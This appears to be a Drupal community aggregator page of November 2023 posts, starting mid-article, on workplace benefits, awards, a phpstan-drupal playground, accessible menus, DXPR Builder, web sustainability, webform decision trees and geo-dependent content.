Ultimately, they compare the results from all organizations nationwide, and award companies for investing time, effort, and resources to ensure a positive workplace culture.

Here Are Some Possible Reasons Why

You may be thinking by now: what’s so great about this organization that they bagged an award for it? 

Some factors come to mind. But mind you, you may not see them as that great. Or noteworthy even.

That’s alright.

However, some of our women team members have benefited significantly from having access to these practices.

Apply at Axelerant by clicking here. We believe people grow better with kindness and support.

Remote Work, The Great Equalizer

Hundred percent remote work means anybody can work from any corner of the world.

An increasingly rare phenomenon—even after the pandemic proved that people didn’t really need to come to a physical location to work together.

In some ways, hybrid workspaces are even worse. 

Because they often create a boundary between people working from the office and people working from home.

In pay, promotion, and opportunities, office workers get the upper hand.

And remote workers are mostly treated as second-class team members.

A 100% remote work opportunity levels the playing field. Nobody gets a brownie point for dragging their body to the office.

Sure, we realize that not everyone can work from home when working remotely.

That’s why we have the monthly co-working space allowance, so that women who need their personal space, away from familial commitments, can rent an office space.

They have the option to choose their workplace every day.

Flexibility To Work Whenever, Wherever

The work-life flexibility that our team members experience has been consistently voted as the top benefit at Axelerant.

We trust team members with the choice of planning and working according to their own time availability. 

The work matters. When and how one does it is up to the individual.

It allows team members to divide their time between personal and professional commitments.

"My kids' school doesn't have a school bus. Because of flexible hours, I get to drop and pick up my kids from school and not fear relying on an unknown person," said Project Manager Merlyn Fernandes.

For team members who are mothers, being close to their children and watching them grow up is a blessing.

Shweta’s status update on work-life flexibility

“As a mother of two kids, if I didn’t have the time to spend with my children, I would’ve not been happy and satisfied either as a professional or a parent. This work-life flexibility is what keeps me going, keeps me happy. I feel successful. And it wouldn’t have been possible without Axelerant,” Sivagami Vasudevan, Technical Workforce Manager, shared. 

These answers confirm what the 2023 GPTW report discovered:

Working in a flexible working environment boosts long-term female team member commitment to work by a significant 15%.

Childcare Allowance To The Rescue

Raising children is as rewarding as it is challenging. 

Hetal Mistry, Director of Global Delivery, found herself in a tough spot when schools shut down in the pandemic in 2021.

Her son needed her attention, and so did her husband after undergoing a serious medical procedure. 

Between family and work commitments, Hetal was stretched thin.

"I raised a question about having a childcare allowance, and it was immediately brought into policy. I felt like a genuine need was heard and acted upon," she shared.

In fall 2021, Axelerant began assisting team members with childcare allowance to support parents and guardians with younger kids for daycare or caretaker expenses.

Delivery Operations Specialist Manjula Balnarayan said, "The child care allowance gave me that extra financial support to care for my toddler."

Caregiver Leave For Emergencies

Every team member enjoys 35 days off annually. 

No sneaky conditions.

You can take Friday and the following Monday off; the weekends won't be counted as leave. 

Clubbing sick and paid leave isn't a cardinal sin—because all off-days are equal.

And you can apply for them whenever and however you want. 

Apart from these 35 days, there's something called Caregiver Leave.

Caregiver leave

It allows team members to take up to 10 days off annually to assist their dependents with medical conditions or a health event requiring emergency care. 

Like emergency hospital admission, an unexpected illness, or last-minute care arrangements. 

Dependents usually mean direct family members, like children, parents, adoptees, partner or spouse, and in-laws.

Equal Pay

It’s embarrassing that we’re still discussing this in the 21st century.

But hey... reality.

The womenfolk of Iceland—from the prime minister to the homemaker—just went on a nationwide strike about it in 2023.

Women still don’t get paid equal to men for the same work. 

We believe every person should be paid the same based on their work, not their gender. And that’s what we follow.

As a People Operations Manager, Vishakha Pinge is involved in Axelerant’s appraisals.

“I remember a leader proactively issued an equal salary raise to a team member on maternity leave, fully aware of her absence from work for the next eight months. It was a testament to our genuine commitment to equality,” she shared.

Impartial And Equal Growth Opportunity 

Another crucial side to equality relates to growth opportunity.

“Women are not given special treatment here, like giving roses and chocolates on Women's Day, while conveniently deprioritizing their actual needs,” shared Hetal. 

Certainly, growth opportunities mean more than one-off annual gifts.

It starts with being heard and respected.

“The respect I get as a woman team player, the gender equality that everyone talks about, is not superficial here. There has not been a single day or moment where I have been spoken to or treated differently,” shared Manjula.

And fostered through impartial investment in people’s growth; for instance, through the  continuing education allowance that allows team members to take up paid courses and training for career growth and promotions.

Every person, regardless of their gender, must get equal opportunities to grow at work.

Uncompromising Support And Safety

Workplace safety comprises physical and psychological safety.

The 2023 GPTW report states: “Workplace politics and a welcoming environment have worsened for women.”

Physical safety is the bare minimum that every organization should invest in and ensure. 

And there’s psychological safety, much harder to achieve.

Psychological safety comes right from the top—from the executives and managers.

And it doesn’t happen organically.

Leaders need human skills training to be able to create safe spaces within teams. And to know how to nurture and protect it. 

Our performance coaches train Axelerant leaders through carefully crafted training courses for this very reason.

So that people feel safe to express themselves without fear.

Remote work guarantees the physical safety and comfort of working from home. 

But it doesn’t mean we compromise on people’s safety during team offsites.

“In the past, I’ve had to travel at odd hours on official visits and stay in very unsafe environments. At Axelerant, I get to choose my timing. And the places identified for stay have always been safe. This is something I've really valued. As a woman, I value physical safety each day,” shared Performance Coach Shalini Neelakantan.

Axelerant Performance Coach Shalini Neelakantan

Hassle-Free Maternity Leave And Rejoining

Yes, we have maternity leave of up to six months, like many other companies.

What’s different is how we approach it, and how would-be mothers taking the leave experience their break. 

And rejoining.

Shefali recognizing Axelerant’s unbiased appraisal system

A pregnancy is the beginning of something miraculous: a new life. 

It’s the beginning of motherhood; a precious period for the team member and her family.

We give our best to ensure that work concerns don’t chip away at that preciousness.

And this intention influences our decisions for people yet to join us, too.

“I got hired here in my first trimester. Companies usually back away from hiring after learning about pregnancies,” said Vishakha Bharnuke, QA Analyst.

For a new mother, work flexibility becomes indispensable. 

And that’s precisely what we try to ensure for a team member returning from maternity leave.

“I was allowed to work flexibly, and peacefully manage my toddler and work. Work-life balance comes so easy with Axelerant,” Vishakha shared.

Vishakha embracing her son

Living Our Core Values Of Openness And Kindness

Axelerant’s core values of Openness, Kindness, and Enthusiasm guide us in everything.

They help us reach decisions that are humane.

“I remember my final round of tech interviews with Shweta (Director of Quality Engineering). During my interview, my one-year-old started being cranky. Shweta considerately paused the interview and asked me to pacify my daughter first,” said Priyasi Singh, QA Analyst.

Decisions that are kind.

Sucheta recognizing Axelerant and her team members for being there for her

Our core values allow us to be open—trusting and treating people respectfully—when most wouldn't.

“I had a tough time dealing with recruiters when returning to work after a career break,” shared Sujatha Varadharajan, Senior Business Analyst.

In one of her interview experiences, the interviewer tossed Sujatha’s resume in the bin and asked her to leave after learning about the break.

“My Axelerant interview was dignified, straightforward, and non-intrusive. I was given a chance to prove myself without being summarily dismissed for taking a career break,” she said.

What Makes An Organization Truly “Great?”

Having systems in place that make people’s lives easier is absolutely needed.

But there are two factors even more essential to building a people-centric organization.

Intention and effort. These two constitute that huge gap between saying and doing, between superficial and life-changing.

And we aim to fill that gap with decisions and actions that empower women team members—and people of all genders and identities—to lead fulfilled lives.

We aren’t the ultimate, perfect example of a great workplace. 

But every time we consciously choose to do right by our people, we are taking one step closer to greatness.

Apply at Axelerant by clicking here. We believe people grow better with kindness and support.
Nov 15 2023
Nov 15

The 2023 Acquia Engage Awards winners were unveiled this morning at Acquia Engage Boston. Third and Grove won the Regional Excellence - North America award, spotlighting our collaboration with Accelera by Cummins. 

Launching a clean energy revolution

The winning submission detailed the launch of accelerazero.com, underscoring Third and Grove’s commitment to helping brands achieve incredible outcomes with Drupal. 

Cummins Inc., a global leader in engine manufacturing, partnered with Third and Grove to showcase its leadership in a new domain: zero-emissions technologies.

With a 412% increase in conversions sitewide, the new platform delivers the speed, security, and flexibility for Accelera by Cummins to face the carbon-free future. See how we did it in our Accelera by Cummins case study. 

As an Acquia Certified Drupal Cloud Practice and Gold partner, Third and Grove carries a decade of experience as a trusted Acquia partner. 

About the Engage Awards 

The Acquia Engage Awards recognize outstanding digital experiences leveraging the Acquia Open DXP.

This year’s competition received many entries spanning a variety of industries and regions in 26 categories. Each submission was presented to a panel of respected digital experts, who evaluated them on functionality, integration, performance, results, overall user experience, and other criteria. 

“Our Engage Award winners shared their most impressive digital experiences with us this year,” said Jennifer Griffin Smith, CMO of Acquia. “We are proud of our customers and partners’ innovative strategies and hard work. We’re excited to celebrate their achievements at Engage Boston.”

Nov 14 2023
Nov 14
Published on Tuesday, 14 November 2023

I'm excited to announce a new feature coming to phpstan-drupal that already exists for PHPStan. PHPStan has an online playground to run and test analysis results. Soon, we will have one for phpstan-drupal! The online playground is an extremely useful tool when reporting bugs to PHPStan and will make it easier to report bugs for phpstan-drupal. 

I had thought about building this previously but was concerned about possible costs. After all, phpstan-drupal is a personal open-source project. It was brought up again in the #phpstan channel in Drupal Slack by Dezső Biczó (mxr576). In a great bit of timing, OPTASY recently signed up as an organization sponsor through GitHub Sponsors. I will use these funds to pay for the playground's operating costs.

When up and running, hopefully by the end of November, the playground will support analyzing code against the latest version of Drupal with PHPStan and phpstan-drupal. Later iterations will allow customizing the version of Drupal used (it's a bit more complicated).

I emailed Ondřej asking if it was okay to copy the code; even though it's open source, it's always good to ask. Ondřej was also nice enough to disclose that the playground is affordable. The phpstan-drupal playground will probably receive less traffic, but I expect it to have longer execution times. With that, I'm assuming it should fall within a reasonable range.

The playground uses the Serverless framework to deploy to AWS Lambda. The code is broken into three components (a sketch of how they might fit together follows the list):

  • playground-runner: Executes sample PHP code with PHPStan configuration and returns the results, not a publicly exposed function.
  • playground-api: Public API, which executes the playground-runner and allows storing results in an S3 bucket for sharing.
  • website: The interface to interact with the playground-api.
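As a rough illustration of that split, here is a hypothetical sketch of how the website component might call the public playground-api. The endpoint URL and payload shape are assumptions for illustration, not the actual API:

async function analyze(code) {
  // POST the sample PHP code to the public API, which executes the
  // playground-runner and returns PHPStan's findings as JSON.
  const response = await fetch('https://playground-api.example.com/analyze', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ code }),
  });
  return response.json();
}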

I got everything up and running in a few hours with a rough interface. The biggest challenge was getting phpstan-drupal to properly analyze with the drupal/core package in the vendor directory. With a few hacks, it works.

However, there are some quirks. When I passed it the following code, I got the correct deprecation errors:

But, when I sent the following:

\Drupal::moduleHandler()->loadInclude('node', 'inc', 'node.admin');

It told me that the \Drupal class could not be found! I have some debugging to do.

I also am going to rewrite the playground-api code copied from PHPStan. PHPStan supports testing code from PHP 7.2 to PHP 8.2 and beyond. The phpstan-drupal playground will only run PHP versions supported by Drupal core. I will also need to see if we can support multiple versions of Drupal core. It might result in a few different playground-runner functions. For example, one for 11.x, 10.3.x, and ^10.2.0. We'll see.

Want more? Sign up for my weekly newsletter

Nov 14 2023
Nov 14

Join us on Thursday, November 16 at 1pm ET / 10am PT, for our regularly scheduled call to chat about all things Drupal and nonprofits. (Convert to your local time zone.)

No pre-defined topics on the agenda this month, so join us for an informal chat about anything and everything at the intersection of Drupal and nonprofits.  Got something specific on your mind? Feel free to share ahead of time in our collaborative Google doc: https://nten.org/drupal/notes!

All nonprofit Drupal devs and users, regardless of experience level, are always welcome on this call.

This free call is sponsored by NTEN.org and open to everyone. 

  • Join the call: https://us02web.zoom.us/j/81817469653

    • Meeting ID: 818 1746 9653
      Passcode: 551681

    • One tap mobile:
      +16699006833,,81817469653# US (San Jose)
      +13462487799,,81817469653# US (Houston)

    • Dial by your location:
      +1 669 900 6833 US (San Jose)
      +1 346 248 7799 US (Houston)
      +1 253 215 8782 US (Tacoma)
      +1 929 205 6099 US (New York)
      +1 301 715 8592 US (Washington DC)
      +1 312 626 6799 US (Chicago)

    • Find your local number: https://us02web.zoom.us/u/kpV1o65N

  • Follow along on Google Docs: https://nten.org/drupal/notes

View notes of previous months' calls.

Nov 14 2023
Nov 14

Drupal’s code is itself an expression of the community’s open source values. The code is there for anyone to use, free of charge, and is always evolving as a result of community contributions. That’s substantially different from proprietary software and demonstrates a commitment to collaboration and transparency.

Similarly, Drupal’s evolution is not solely about refining its API or enhancing user interface design – it’s intrinsically linked to shared experiences and mutual learning within the community. DrupalCon allows developers and users from various backgrounds to come together not only to share knowledge about the platform but also to shape the future direction of the software based on collective feedback and diverse needs.

This all means that the story of how Drupal has changed isn’t just about software. It’s also about how we, the community of people who make Drupal possible, understand ourselves.

In this article, we’ll take a look back at the history of Drupal, focusing on the narratives that have shaped the community. In doing so, we hope to provide an insight into the forces that have powered Drupal’s growth and resilience. Furthermore, analyzing the ongoing evolution of these narratives helps illuminate what future shifts may be on the horizon for the Drupal ecosystem.

Looking to the future, we’ll also consider how the community will continue to develop, and why the Open Web Manifesto encapsulates the aspirations this community has expressed for over 20 years. While Drupal itself has kept evolving, what has remained constant is our shared commitment to an open, inclusive, and equitable web.

Sailing on the ship of Theseus

Palantir began using and contributing to Drupal in 2006. Since then, I’ve also served on the Board of Directors of the Drupal Association and helped organize several camps and events. This long perspective has given me some fascinating insights into how Drupal — and its community — have evolved.

When we talk about Drupal, it’s tempting to think about it as the product – as the code itself. But the code that was written in 2001 is not what is running today.

Drupal is like the Ship of Theseus, the subject of a famous thought experiment first written about by ancient Greek philosopher and historian Plutarch. The Athenians wanted to preserve Theseus’s ship, so over many years, they replaced its parts as they wore out, plank by plank. 

The question is: Once all the planks have been replaced, is it still the Ship of Theseus? If it’s not, at what point does it stop being the original ship, and become a replacement? After one plank? After twenty? Or is there a sense of identity the ship possesses that is independent of its parts, related instead to the way people talk about and use it?

For many people, the idea that identity isn’t just about constituent parts helps clarify the paradox. And it also helps shed some light on Drupal. Even if none of the original Drupal code is being used today, a Drupal identity has persisted. This identity doesn’t just stem from one person (not even from Dries!). Rather, Drupal’s special factor has always been its community – all the people who build Drupal and make it work.

It’s the culture — the values, the assumptions, and the beliefs — of the people sailing on the Ship of Theseus that determines why it’s still the same ship, for all the changes it’s seen.

Drupal is an ecosystem, built by contributors of code and of non-code, backed by an infrastructure hosted by the Drupal Association, supported by businesses, and used by people and organizations to power more than 2% of the top million sites on the web. All of these people coming together make up different parts of the Drupal community – and it’s all of us who really determine what Drupal is, not any specific line of code.

The stories we tell ourselves

The stories we tell ourselves have been a major driver of Drupal’s ability to achieve ongoing success and remain resilient as a decentralized, global and volunteer-based open-source project. They are narratives that tie together the hundreds of thousands of contributors over Drupal’s history.

These shared stories reflect Drupal’s culture. And what they show is that our culture has been substantially shaped by non-code contributions from businesses and individuals — more so than by the code itself.

Let’s consider three key narratives that have shifted over time to gain an insight into the forces that have powered Drupal’s growth and resilience.

Eat your own dog food? No, get off the Drupal island!

“Dogfooding” is a term used for the practice in which tech workers use their own product consistently to see how well it works and where improvements can be made.

In the early days of Drupal, there was a strong ethos of “eating your own dog food” — building tools for the community’s needs using Drupal itself. With Drupal as their hammer, contributors approached many tasks as nails that could be driven home by extending Drupal.

Much of this was born of necessity in the absence of alternatives. Drupal provided the Groups module for community interaction before social media existed. The Project module enabled collaboration before Git. Local Drupal camps relied on homegrown event management systems like COD. The Drupal Association itself was formed partly to provide infrastructure after early infrastructure failures.

Over time, however, the Drupal community embraced integrating with external tools better suited for certain tasks. Infrastructure moved to Git and Slack. Camps adopted specialized event registration systems. Core adopted the Symfony framework.

While retaining its innovative spirit, Drupal evolved to focus on its strengths, looking to other technologies to inspire and augment its capabilities. The narrative shifted from an insular “eat your own dogfood” to a more outward-looking “get off Drupal island.” The big tent expanded to include complementary tools, acknowledging that Drupal need not solve every problem alone.

This evolution demonstrates the community’s pragmatism and maturity. By recognizing external solutions, contributors avoid reinventing the wheel. The new narrative reflects a holistic understanding of how Drupal fits into the broader technology landscape.

Talk is silver, code is gold? No! Come for the code, stay for the community.

In the early days of Drupal, the dominant narrative was “talk is silver, code is gold” — only contributions to the codebase mattered. However, over time the community realized the interplay between community-focused activities and code contributions provided mutual benefit. Research shows community participation expands social ties, shapes strategy, and focuses innovation, even without directly affecting code productivity.

Drupal’s evolution reflects the growing appreciation of community-oriented work. Adoption of a Code of Conduct for events marked increased investment in healthy interactions. The creation of the Community Working Group demonstrated the importance of conflict resolution. Rewriting the Code of Conduct in plain language and forming a Community Health Team required tremendous time and emotional labor — but is strong evidence of the value now placed on community. Local Drupal communities now actively collaborate. Shared playbooks spread knowledge and regions like Europe brought back DrupalCon.

The narrative has now shifted from “talk is silver, code is gold” to “come for the code, stay for the community”. This underlines how vital non-coding work is in enabling Drupal’s success.

Scratch your own itch? No, if you want to go far, go together!

Early Drupal embodied the “scratch your own itch” ethos — solve your own problems and build what you need. Drupal was likened to a box of Legos: you could find many disparate pieces, and sometimes there were instructions on how to build with them. But if you couldn’t find what you wanted, you’d have to come up with your own design.

This attitude combined with what we might call a “benevolent dictator for life” model, whereby community members felt they needed permission from Dries before undertaking anything major. Indeed, many sought intervention from Dries across code, governance, and conflict resolution, developing unhealthy hierarchical expectations. Disagreements often devolved into “epic bikeshedding”, resulting in exhausting debates where the most stubborn prevailed unless a particular argument caught Dries’s attention.

As the community grew, this proved unsustainable. While some called for more hierarchy, Drupal resisted a full leadership structure. Code may have correct answers, but people and social issues are messy. Extending hierarchical expectations to non-code contributions risked grinding everything to a halt, replicating the “bikeshedding” debates.

Instead, Drupal evolved from “scratch your own itch” individualism towards “if you want to go far, go together” collaboration. This new era saw greater coordination through strategic initiatives and working groups. These collective efforts enabled tackling challenges at scale rather than relying solely on individual contributors. Work could be distributed across many hands to achieve impact not possible alone.

Another major non-code innovation was the contribution credit system. Traditional open source celebrated individual contributors and their achievements. But Drupal needed to accommodate organizations like governments wanting collective credit.

Rather than giving organizations direct commit access, Drupal pioneered contributors claiming credit for their organizations. This preserved individual recognition while tracking organizational impact. Crucially, the system included non-code work from the start.

Though imperfect, contribution credits surface essential non-coding activities like documentation, mentoring, and event organizing. Granting visibility makes the work more valued. It says all contributions, not just code, are worthy of recognition.

Businesses have also collaborated to provide infrastructure, funding, and other resources for collective benefit. 

Future projections: Networked, regenerative, listening

As Drupal continues to evolve, three potential paths forward emerge from these past narratives. These point to a future in which Drupal will become more networked, more regenerative, and will invite even more community listening.

  • Networked
    Past centralized coordination efforts brought much-needed structure but also new complexities. Consensus and decision-making become challenging at scale.

    In the future, a compromise solution will exist in the form of networking — decentralized creative partnerships and empowered teams tailored to specific needs. Breaking down work into smaller scopes makes problems more tractable, shifting the mindset from scarcity and exclusivity to abundance and inclusion. Creative partnerships facilitated through the Drupal Association can promote consent-based and “safe to fail” decision-making, while flexible contribution models will allow individuals and businesses to smooth resource constraints.
     

  • Regenerative
    Drupal creates tremendous value but cannot fully capture or distribute it equitably. Anti-patterns of exploitation and burnout persist, disproportionately affecting core contributors.

    To sustain success, Drupal must encourage, enable, and recognize pro-community actions. It must also differentiate which parts of the ecosystem are public goods that anyone should be able to use for free, and which are more akin to commons — that is, to areas that require a degree of care and input from those using them. Not all of Drupal’s major cost centers are public goods.

    Strengthening organizational protocols, growing leadership pipelines, planning for transitions, and sharing knowledge will make the ecosystem more sustainable and resilient without being exclusive. Regenerative practices that distribute effort and reward more equitably will reduce burnout. The result is a system built to thrive through ongoing renewal of its most vital asset — engaged contributors.
     

  • Listening
    Getting off the island helped make us aware of the bigger picture. We need to think globally before we act locally.

    This means tending to the Drupal ecosystem by structuring for flexibility. Accommodating different contributor types enables pioneers, maintainers, and coordinators to play their roles. The Drupal Association ought to act as a kind of town planner.

    At the same time, we must also shape the external landscape by collaborating with other open source communities. Providing feedback on policies like the EU Cyber Resilience Act makes the terrain more hospitable for open source as a whole. Listening through participation in the open web movement will help contextualize Drupal’s place and influence. It allows acting both locally and globally — solving immediate needs while advancing the broader open technology ecosystem.

The Open Web Manifesto

Like any living system, Drupal must continuously adapt while remaining true to its core values. The Open Web Manifesto articulates Drupal’s commitment to an open, decentralized, inclusive web built on freedom and participation.

The manifesto declares the Open Web a cause driven by principles, not just technology. It must be permissionless, letting anyone contribute. No single entity controls it. The Open Web welcomes all as users, creators, architects, and innovators regardless of identity or status. Sustaining it requires deliberate, collaborative effort.

Drupal sustains the Open Web through its creativity, diversity, and integrity. Its global community puts open source collaboration into practice, introducing participatory digital experiences. This empowers Drupal's partners, contributors, and users alike.

By remaining true to its ethos while adapting to a changing world, Drupal can keep shaping an equitable digital landscape. The narratives that brought Drupal this far — from independence to interdependence, visibility to value, and co-opetition — point towards an even more vibrant, resilient and regenerative future. 

If Drupal continues listening to its community’s needs while engaging with the global ecosystem, it can flourish for decades to come as a thriving open source leader empowering people to build a better web.

Cropped version of Drupalcon 2009 - Paris - 17 by Chris Heuer licensed under CC BY-NC-SA 2.0 DEED.

Nov 14 2023
Nov 14

It's a standard component:

a menu where the user can hover over a top-level menu item to see its submenu

Almost every one of our clients has requested a variation of this at the top of every page of their website. Starting with Drupal 7, we became accustomed to a specific toolset for building these. There were lots of options, mobile support, and everything worked from our perspective and our client's perspective. But our menus had a bias towards visual users with a mouse. The words "hover" and "see" were in the definition of the component, actions only a subset of users can accomplish. Accessibility and inclusivity need to start at the roots, so we redefined the component:

a menu where each top-level menu item has a submenu that the user can choose to navigate

With this definition, it became obvious the component was broken for keyboard users, because they did not have a choice. Using a keyboard to navigate through menu links meant tabbing through every single submenu. So how do we do this better?

We started by looking at recommendations from the WAI Authoring Practices Guide and found the Disclosure Navigation Hybrid Menu. This component simply adds a toggle button to open submenus. Now all users have a choice.

a menu with a submenu toggle button

Re-handling Hover

With the basic interface set, we needed to re-add the hover navigation. But this created a conflict. If a user hovers over the toggle button, the submenu should open. If a user clicks the toggle button, the submenu should toggle. So if a user hovers over a toggle button and clicks it, then the submenu is toggled open and immediately toggled shut. Here are some solutions we've built to resolve this behavior:

  1. Keyboard only: the toggle button can only be triggered by keyboard, not pointer devices.
  2. Only open: clicking the toggle button only opens the submenu.
  3. Hide until focused: visually hide the toggle button until it receives tab focus, so pointers can't access it by default.

Leveraging the Full-stack in Drupal

When rebuilding this component, we looked at existing JavaScript libraries, but kept running into the same issues. Either they were so opinionated about the HTML that it was difficult to template in Drupal, or they were so generic that they were inconsistent and hard to customize. Finally, we realized that we could write the template and JavaScript in tandem, and we created a customizable component with fewer than 200 lines of JavaScript and no external dependencies.

In fact, our accessibility standards actually made the functionality easier to code, thanks to the aria-controls and aria-labelledby attributes. For example, a toggle button for a submenu has an aria-controls attribute set to the ID of the corresponding submenu, and the submenu has its aria-labelledby attribute set to the ID of the toggle button. This is necessary for screen readers to communicate connections between elements that can't be seen, but it also makes it trivial to code the toggle interaction. Other libraries often create data models of the menu to track these connections, but that's not necessary when everything is explicitly defined in the HTML.

The only issue is generating unique IDs for all the toggles and submenus. But Drupal makes this easy for us with its Html utility class, which provides a simple getUniqueId method. And now in Drupal 10.2 there's a clean_unique_id function for Twig templates.
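To make that concrete, here is a minimal sketch of the toggle interaction, assuming hypothetical markup where each toggle is a button whose aria-controls points at its submenu's ID (the contributed module's actual code is more complete):

document.querySelectorAll('button[aria-controls]').forEach((toggle) => {
  toggle.addEventListener('click', (event) => {
    // For the "keyboard only" hover strategy described earlier, pointer
    // clicks could be ignored here: keyboard activation of a button fires
    // a click event with event.detail === 0, while pointer clicks report
    // a positive detail.

    // aria-controls already names the submenu, so no data model is needed.
    const submenu = document.getElementById(toggle.getAttribute('aria-controls'));
    const expanded = toggle.getAttribute('aria-expanded') === 'true';
    toggle.setAttribute('aria-expanded', String(!expanded));
    submenu.hidden = expanded;
  });
});

Toggling the hidden attribute keeps the open/closed state in the markup as well; the hover handling described earlier layers on top of this.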

Contribution

And once all of that was figured out, we gave the component back to Drupal and, thanks to the community, made it stable and secure. So the next time a client needs a complex menu without losing accessibility, load up Disclosure menu and see if it fits your needs. If not, file an issue and let's make it better for everyone.

Nov 13 2023
Nov 13

We're excited to announce the upcoming launch of DXPR Builder 3.0.0, expected around the turn of the year, marking a significant step towards the future of no-code editing for professional content teams. This release is not just an upgrade; it's a transformation that balances the needs of Drupal content editors with the strategic goals of large organizations.

Seamless Drupal 10 Integration: CKEditor 5

For content marketers, DXPR Builder 3.0.0 brings a significant upgrade with the migration from CKEditor 4 to CKEditor 5. This enhancement ensures a more intuitive editing experience, allowing content teams to focus on creativity and efficiency.

Thanks to CKEditor 5's plugin architecture, we can integrate the editor with Drupal, as well as with the Bootstrap 5 framework. For example, we're ensuring every table inserted with the text editor is a mobile-responsive Bootstrap table.

Mobile Editing: On-the-Go Flexibility

Previewing the future of mobile editing, DXPR Builder 3.0.0 transforms the way professional content teams work. This release will make it possible for the first time in Drupal to have a full-fledged mobile editing experience, offering unprecedented flexibility and on-the-go editing capabilities, enhancing the Drupal content management ecosystem.

Font Awesome 6: A Richer, Future-Proof Icon Set

Transitioning to Font Awesome 6, we're offering a richer set of icons, ensuring that your marketing materials stay fresh and relevant. This update, while keeping backward compatibility, reflects our commitment to providing tools that scale with your organizational needs.

Intuitive Content Management with Skeleton/Wireframe View

The new skeleton/wireframe view mode is designed to streamline the management of complex elements, catering to the needs of dynamic content teams in large organizations. This feature simplifies the reordering process, enhancing the overall efficiency of content creation.

It allows for easy re-ordering of elements that can currently be a bit harder to drag and drop, like large sections. This update will make it possible for the first time to re-order slides within carousels.

Backward Compatibility: A Smooth Transition

Understanding the importance of continuity, we ensure a smooth transition with backward compatibility for CKEditor 4 content and Font Awesome icons. This approach minimizes disruption, allowing your team to adapt without sacrificing productivity.

Thanks to CKEditor 5's recent updates in backward compatibility, we expect a painless migration process with no need for database updates on your content.

Why DXPR Builder 3.0.0 is Ideal for Your Organization

DXPR Builder 3.0.0 is designed to align with the strategic objectives of large organizations. It offers scalability, enhances productivity, and ensures that your content marketing team has the most advanced tools at their disposal. The upgrade to DXPR Builder 3.0.0 is more than an improvement in technology; it's an investment in your organization's future.

Want to explore DXPR's no-code and low-code Drupal experience? Try our online demo or install our Drupal StarterKit which saves you hundreds of hours with a pre-configured DXPR Drupal set-up.

Stay Tuned: As we approach the release date, we are eager to unveil more features that align with our vision of the future of mobile editing for professional content teams. We're committed to empowering your organization with innovative tools that redefine digital storytelling and content creation.

Nov 13 2023
Nov 13

Today we are talking about the Web Sustainability Guidelines, how sustainability applies to the web, and how your website can be more sustainable with guests Mike Gifford and Andy Blum. We’ll also cover LB Plus as our module of the week.

For show notes visit:
www.talkingDrupal.com/424

Topics

  • What are the Web sustainability guidelines
  • Do they only apply to environmental impact
  • When we think about sustainability we think of funding, does WSG speak to that
  • Why are the WSG important
  • What is the best way to implement WSG
  • How do the WSGs apply to Drupal
  • Have the WSGs been finalized
  • Are they open source
  • How can someone get involved

Resources

Guests

Mike Gifford - mgifford.medium.com @mgifford

Hosts

Nic Laflin - nLighteneddevelopment.com nicxvan
John Picozzi - epam.com johnpicozzi
Melissa Bent - linkedin.com/in/melissabent merauluka

MOTW

Correspondent

Martin Anderson-Clutz - @mandclu
Layout Builder Plus

  • Brief description:
    • Have you ever wanted to make Layout Builder easier and more intuitive for content creators? There are a few modules that can help with that, but today we’re going to talk about one called Layout Builder Plus
  • Brief history
    • How old: Originally created in Apr 2022
    • Versions available: 2.0.1 release, compatible with Drupal 10 and 11
  • Maintainership
    • Actively maintained, latest release just a week ago
    • Number of open issues: 2, both bugs, but both marked as fixed
  • Usage stats:
  • Maintainer(s):
    • Tim Bozeman of Tag1
  • Module features and usage
    • Provides an overhaul of the Layout Builder UI, to make it easier for content creators:
    • Show a curated list of promoted blocks with icons, with lesser-used blocks available in a separate tab
    • Once a block is placed it shows automatically generated content, instead of asking the user to fill out a form before they can see what it will look like
    • Editing the content of a block happens in an overlay instead of the settings tray, so it can use more of the screen
    • Moves the Save Layout and other action buttons to the bottom of the page
    • Also adds some nice capabilities to Layout Builder, including:
    • Drag and drop entire sections
    • Change the layout of an existing section, even if it has blocks in it
    • Clone and update existing blocks
    • Finally, it includes a submodule to integrate with the Section Library module, which allows for a section within a layout to be saved so it can be reused again and again
    • I’ll also note that this is a module nominated by one of our listeners in the #talkingdrupal channel of the Drupal slack workspace, so if there’s a module you’d like to hear about in this segment, drop us a note in there
Nov 13 2023
Nov 13

Ever needed to create a "decision tree" or "Smart Answers" feature and didn't know where to start? It's pretty easy if you use Drupal's webform module and add conditional handlers for the confirmation settings (all through a few clicks in the webform UI).

Creating a decision tree is quite easy using the Drupal Webform UI. Here's the outline:

Nov 13 2023
Nov 13

Task

One of ADCI Solutions’ clients is an American window and door manufacturer. The client needed an unusual feature: depending on the user's geolocation, the content on the website had to change slightly.

Geo-dependent content is a type of website content that changes depending on the user's location.

For instance, in hot Texas, a black window casement will heat up very quickly. This is why it is not available for ordering in this state. Another example: buyers from some states will not find a certain window series on the website because it is not manufactured there. All combinations are set in the admin panel.

how to implement geo-dependent content

How the feature is usually implemented

To dynamically change a site element, a rule is set on the backend. If the user's geolocation matches the geolocation specified in the rule, some part of the content on the newly loaded page changes or disappears.

The problem is that this kills the cache of the element, block, or, in the worst case, the entire page. This means that the user has to wait for the page to load again, although it could have simply been accessed from the cache.

content geo-dependency

How we did it

We wrote the Front-end Modifier module for working with geo-dependent content. It is built with JavaScript and implemented on the user side, bypassing the cache.

All geolocation-sensitive elements are hidden by default. As the page loads, only the elements relevant to the detected geolocation appear, while irrelevant ones remain hidden. This avoids poor UX: without it, elements flicker as the page loads, and a user who briefly sees an element that then disappears is left confused.

With the Front-end Modifier, we set rules, for example, to hide a window series for certain regions, replace one element with another, and so on. When the page loads, the rule loads along with it and filters the selected elements using JS. The module concept can be reused on other projects if the client knows exactly which criteria they want to use to classify goods or services, and which content to show or hide under known conditions.
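To make the approach concrete, here is a minimal sketch of this kind of client-side filtering. It is not the actual Front-end Modifier code; the data-region attribute and the region cookie are hypothetical names used only for illustration:

// Illustrative sketch only: reveal elements whose (hypothetical) data-region
// attribute matches the region stored in a (hypothetical) "region" cookie.
document.addEventListener('DOMContentLoaded', function () {
  var match = document.cookie.match(/(?:^|;\s*)region=([^;]+)/);
  var region = match ? decodeURIComponent(match[1]) : 'default';
  document.querySelectorAll('[data-region]').forEach(function (el) {
    // Elements are hidden by default; only show those relevant to the region.
    if (el.dataset.region === region) {
      el.hidden = false;
    }
  });
});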

geo-dependent content on drupal

Manual geolocation input

We allow site users to change geolocation manually in case they need to order window installation in another city.

Imagine: a user from New York goes on vacation to San Francisco. There, they decide to order new windows for their home. By default, they will be taken to a site aimed at California residents. All the user needs to do is enter their home zip code in a special box, and they will be redirected to their “home” website.

